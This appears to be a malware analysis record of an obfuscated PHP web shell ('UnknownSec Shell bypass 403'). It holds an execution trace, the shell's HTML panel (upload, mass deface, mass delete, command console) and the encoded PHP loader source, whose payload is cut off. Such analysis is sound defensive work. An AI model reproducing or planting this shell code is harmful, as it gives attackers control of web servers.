3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	$ft = '2023-02-13 08:31:54'
4	117	0	0.007761	588056	is_file	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	573	1	'/var/www/html/uploads/data'
4	117	1	0.007775	588096
4	117	R			FALSE
4	118	0	0.007788	588064	filemtime	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	1	'/var/www/html/uploads/en_bypass403.php'
4	118	1	0.007803	588112
4	118	R			1676251914
4	119	0	0.007817	588008	date	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	2	'Y-m-d H:i:s'	1676251914
4	119	1	0.007833	588336
4	119	R			'2023-02-13 08:31:54'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	$ft = '2023-02-13 08:31:54'
4	120	0	0.007858	588072	is_file	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	573	1	'/var/www/html/uploads/en_bypass403.php'
4	120	1	0.007873	588112
4	120	R			TRUE
4	121	0	0.007885	588008	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	574	1	'posix_getpwuid'
4	121	1	0.007899	588048
4	121	R			TRUE
4	122	0	0.007912	588072	fileowner	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	575	1	'/var/www/html/uploads/en_bypass403.php'
4	122	1	0.007926	588112
4	122	R			1000
4	123	0	0.007938	588008	posix_getpwuid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	575	1	1000
4	123	1	0.007970	588824
4	123	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	575	$fowner = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	576	$fowner = 'osboxes'
4	124	0	0.008026	588008	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	580	1	'posix_getgrgid'
4	124	1	0.008041	588048
4	124	R			TRUE
4	125	0	0.008054	588072	filegroup	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	581	1	'/var/www/html/uploads/en_bypass403.php'
4	125	1	0.008068	588112
4	125	R			1000
4	126	0	0.008080	588008	posix_getgrgid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	581	1	1000
4	126	1	0.008112	588664
4	126	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	581	$fgrp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	582	$fgrp = 'osboxes'
4	127	0	0.008161	588328	filesize	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	590	1	'en_bypass403.php'
4	127	1	0.008177	588352
4	127	R			8153
4	128	0	0.008190	588312	sz	1		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	590	1	8153
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	32	$sz = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	33	$i = 0
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	33	$byt /= 1024
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	33	$i++
5	129	0	0.008257	588312	round	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	34	2	7.9619140625	2
5	129	1	0.008272	588384
5	129	R			7.96
4	128	1	0.008286	588344
4	128	R			'7.96 KB'
4	130	0	0.008301	588056	is_writable	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	593	1	'/var/www/html/uploads/en_bypass403.php'
4	130	1	0.008318	588096
4	130	R			FALSE
4	131	0	0.008332	588056	is_readable	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	594	1	'/var/www/html/uploads/en_bypass403.php'
4	131	1	0.008348	588096
4	131	R			TRUE
4	132	0	0.008361	588056	p	1		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	595	1	'/var/www/html/uploads/en_bypass403.php'
5	133	0	0.008375	588056	fileperms	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	55	1	'/var/www/html/uploads/en_bypass403.php'
5	133	1	0.008390	588112
5	133	R			33204
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	55	$p = 33204
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	56	$i = 'u'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	59	$i = '-'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	64	$i .= 'r'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	65	$i .= 'w'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	66	$i .= '-'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	67	$i .= 'r'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	68	$i .= 'w'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	69	$i .= '-'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	70	$i .= 'r'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	71	$i .= '-'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	72	$i .= '-'
4	132	1	0.008532	588112
4	132	R			'-rw-rw-r--'
4	134	0	0.008546	588072	is_writable	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	596	1	'/var/www/html/uploads/en_bypass403.php'
4	134	1	0.008563	588112
4	134	R			FALSE
4	135	0	0.008576	588072	is_readable	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	596	1	'/var/www/html/uploads/en_bypass403.php'
4	135	1	0.008592	588112
4	135	R			TRUE
4	136	0	0.008606	588072	filemtime	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	1	'/var/www/html/uploads/prepend.php'
4	136	1	0.008622	588112
4	136	R			1676251914
4	137	0	0.008635	588008	date	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	2	'Y-m-d H:i:s'	1676251914
4	137	1	0.008652	588336
4	137	R			'2023-02-13 08:31:54'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	572	$ft = '2023-02-13 08:31:54'
4	138	0	0.008678	588072	is_file	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	573	1	'/var/www/html/uploads/prepend.php'
4	138	1	0.008707	588112
4	138	R			TRUE
4	139	0	0.008720	588008	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	574	1	'posix_getpwuid'
4	139	1	0.008795	588048
4	139	R			TRUE
4	140	0	0.008814	588072	fileowner	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	575	1	'/var/www/html/uploads/prepend.php'
4	140	1	0.008830	588112
4	140	R			0
4	141	0	0.008856	588008	posix_getpwuid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	575	1	0
4	141	1	0.008884	588808
4	141	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	575	$fowner = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	576	$fowner = 'root'
4	142	0	0.008968	588008	function_exists	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	580	1	'posix_getgrgid'
4	142	1	0.008983	588048
4	142	R			TRUE
4	143	0	0.009001	588072	filegroup	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	581	1	'/var/www/html/uploads/prepend.php'
4	143	1	0.009016	588112
4	143	R			0
4	144	0	0.009048	588008	posix_getgrgid	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	581	1	0
4	144	1	0.009073	588664
4	144	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	581	$fgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	582	$fgrp = 'root'
4	145	0	0.009135	588328	filesize	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	590	1	'prepend.php'
4	145	1	0.009152	588344
4	145	R			57
4	146	0	0.009165	588304	sz	1		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	590	1	57
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	32	$sz = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	33	$i = 0
5	147	0	0.009205	588304	round	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	34	2	57	2
5	147	1	0.009219	588376
5	147	R			57
4	146	1	0.009234	588336
4	146	R			'57 B'
4	148	0	0.009248	588048	is_writable	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	593	1	'/var/www/html/uploads/prepend.php'
4	148	1	0.009266	588088
4	148	R			FALSE
4	149	0	0.009279	588048	is_readable	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	594	1	'/var/www/html/uploads/prepend.php'
4	149	1	0.009296	588088
4	149	R			TRUE
4	150	0	0.009308	588048	p	1		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	595	1	'/var/www/html/uploads/prepend.php'
5	151	0	0.009322	588048	fileperms	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	55	1	'/var/www/html/uploads/prepend.php'
5	151	1	0.009338	588112
5	151	R			33261
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	55	$p = 33261
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	56	$i = 'u'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	59	$i = '-'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	64	$i .= 'r'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	65	$i .= 'w'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	66	$i .= 'x'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	67	$i .= 'r'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	68	$i .= '-'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	69	$i .= 'x'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	70	$i .= 'r'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	71	$i .= '-'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	72	$i .= 'x'
4	150	1	0.009481	588112
4	150	R			'-rwxr-xr-x'
4	152	0	0.009495	588072	is_writable	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	596	1	'/var/www/html/uploads/prepend.php'
4	152	1	0.009512	588112
4	152	R			FALSE
4	153	0	0.009525	588072	is_readable	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	596	1	'/var/www/html/uploads/prepend.php'
4	153	1	0.009541	588112
4	153	R			TRUE
4	154	0	0.009555	588008	date	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	617	1	'Y'
4	154	1	0.009570	588296
4	154	R			'2023'
3	17	1	0.009586	588008
2	13	1	0.009602	500304
1		A						/var/www/html/uploads/en_bypass403.php	10	$STOP = 'kucx4B8RPsGUEFGamUySB40kx7HHsXdjj2E7+zawZgWIgAR4KILhRTNO/H7GO+zl/Yr+QXwC+kBCBx761DCwVdVNsklRHzPjrHdtYESxq6uqu+u7u3X/XipiOU7lVCy9eBwnc/kh8uWYy7hpP+KJ6P6buBRhLOzW6f17jbHPBsz+xb/0o4X/Rro2veTw0urz+NqTw1hM'
1	3	1	0.009629	498472
			0.009728	413688
TRACE END   [2023-02-12 23:32:20.484795]


Generated HTML code

<html><head>
		<meta name="author" content="UnknownSec">
		<meta name="robots" content="noindex,nofollow">
		<title>localhost - UnknownSec</title>
		<meta name="viewport" content="width=device-width, initial-scale=0.70">
		<link rel="stylesheet" href="//random-php.ftp.sh/style.css">
		<script src="//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js"></script>
		<script src="//cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js"></script>
		<script src="//code.jquery.com/jquery-3.3.1.slim.min.js"></script>
	<style>
.shell {
	border-radius: 4px;
	border: 1px solid rgba(255, 255, 255, 0.4);
	font-size: 10pt;
	display: flex;
	flex-direction: column;
	align-items: stretch;
	background: #242424;
	color: #fff;
}
.pre {
	height: 500px;
	overflow: auto;
	white-space: pre-wrap;
	flex-grow: 1;
	margin:10px auto;
	padding:10px;
	line-height:1.3em;
	overflow-x:scroll;
}
</style></head>

<body class="bg-secondary text-light">
<div class="container-fluid">
	<div class="py-3" id="main">
		<div class="box shadow bg-dark p-4 rounded-3">
			<div class="corner text-secondary">shell bypass 403</div>
				<a class="text-decoration-none text-light" href="/en_bypass403.php"><h4>UnknownSec Shell</h4></a><div class="table-responsive"><i class="bi bi-hdd-rack"></i> : <a class="text-decoration-none text-light" href="?path=/">/</a><a class="text-decoration-none" href="?path=/var">var</a>/<a class="text-decoration-none" href="?path=/var/www">www</a>/<a class="text-decoration-none" href="?path=/var/www/html">html</a>/ [ <gr>drwxrwxrwx</gr> ]</div>
		</div>
	</div>
</div>
<div class="container-fluid">
	<div class="box shadow bg-dark p-4 rounded-3">
		<div class="text-center">
			<a class="btn btn-outline-light btn-sm" href="?id=upload&amp;path=/var/www/html"><i class="bi bi-upload"></i> upload</a>
			<a class="btn btn-outline-light btn-sm" href="?id=deface&amp;path=/var/www/html"><i class="bi bi-exclamation-diamond"></i> mass deface</a>
			<a class="btn btn-outline-light btn-sm" href="?id=delete&amp;path=/var/www/html"><i class="bi bi-trash"></i> mass delete</a>
			<a class="btn btn-outline-light btn-sm" href="?id=cmd&amp;path=/var/www/html"><i class="bi bi-terminal"></i> console</a>
			<a class="btn btn-outline-light btn-sm" href="?id=info&amp;path=/var/www/html"><i class="bi bi-info-circle"></i> info server</a>
		</div><div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
	<td class="text-center">name</td>
		<td class="text-center">last edit</td>
		<td class="text-center">size</td>
		<td class="text-center">owner<gr>:</gr>downer</td>
		<td class="text-center">permission</td>
	<td class="text-center">options</td>
</tr>
</thead>
<tbody class="text-nowrap">
<tr>
	<td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?path=/var/www">..</a></td><td></td><td></td><td></td><td></td><td class="text-center">
		<div class="btn-group">
			<a class="btn btn-outline-light btn-sm" href="?id=filebaru&amp;path=/var/www/html"><i class="bi bi-file-earmark-plus-fill"></i></a>
			<a class="btn btn-outline-light btn-sm" href="?id=dirbaru&amp;path=/var/www/html"><i class="bi bi-folder-plus"></i></a>
		</div>
	</td>
</tr>
<tr>
	<td><i class="bi bi-file-earmark-code-fill"></i><a class="text-decoration-none text-secondary" href="?filesrc=/var/www/html/beneri.se_malware_analysis&amp;path=/var/www/html">beneri.se_malware_analysis</a></td>
	<td class="text-center">2023-02-13 08:31:46</td>
	<td class="text-center">0 B</td>
	<td class="text-center">root<gr>:</gr>root</td>
	<td class="text-center">-rw-r--r--
	</td><td class="text-center">
		<form method="POST" action="?option&amp;path=/var/www/html">
			<div class="btn-group">
				<button class="btn btn-outline-light btn-sm" name="opt" value="edit"><i class="bi bi-pencil-square"></i></button>
				<button class="btn btn-outline-light btn-sm" name="opt" value="rename"><i class="bi bi-pencil-fill"></i></button>
				<button class="btn btn-outline-light btn-sm" name="opt" value="download"><i class="bi bi-download"></i></button>
				<button class="btn btn-outline-light btn-sm" name="opt" value="delete"><i class="bi bi-trash-fill"></i></button>
			</div>
			<input type="hidden" name="type" value="file">
			<input type="hidden" name="name" value="beneri.se_malware_analysis">
			<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
		</form>
	</td>
</tr>
<tr>
	<td><i class="bi bi-file-earmark-code-fill"></i><a class="text-decoration-none text-secondary" href="?filesrc=/var/www/html/en_bypass403.php&amp;path=/var/www/html">en_bypass403.php</a></td>
	<td class="text-center">2023-02-13 08:31:46</td>
	<td class="text-center">7.96 KB</td>
	<td class="text-center">osboxes<gr>:</gr>osboxes</td>
	<td class="text-center">-rw-rw-r--
	</td><td class="text-center">
		<form method="POST" action="?option&amp;path=/var/www/html">
			<div class="btn-group">
				<button class="btn btn-outline-light btn-sm" name="opt" value="edit"><i class="bi bi-pencil-square"></i></button>
				<button class="btn btn-outline-light btn-sm" name="opt" value="rename"><i class="bi bi-pencil-fill"></i></button>
				<button class="btn btn-outline-light btn-sm" name="opt" value="download"><i class="bi bi-download"></i></button>
				<button class="btn btn-outline-light btn-sm" name="opt" value="delete"><i class="bi bi-trash-fill"></i></button>
			</div>
			<input type="hidden" name="type" value="file">
			<input type="hidden" name="name" value="en_bypass403.php">
			<input type="hidden" name="path" value="/var/www/html/en_bypass403.php">
		</form>
	</td>
</tr>
</tbody>
</table>
<div class="text-secondary">© 2023 UnknownSec</div>
</div>
</div>

</div></body></html>

Original PHP code

<?php
/* [email protected] */
set_time_limit(0);
error_reporting(0);
@ini_set('error_log',null);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$SISTEMIT_COM_ENC = "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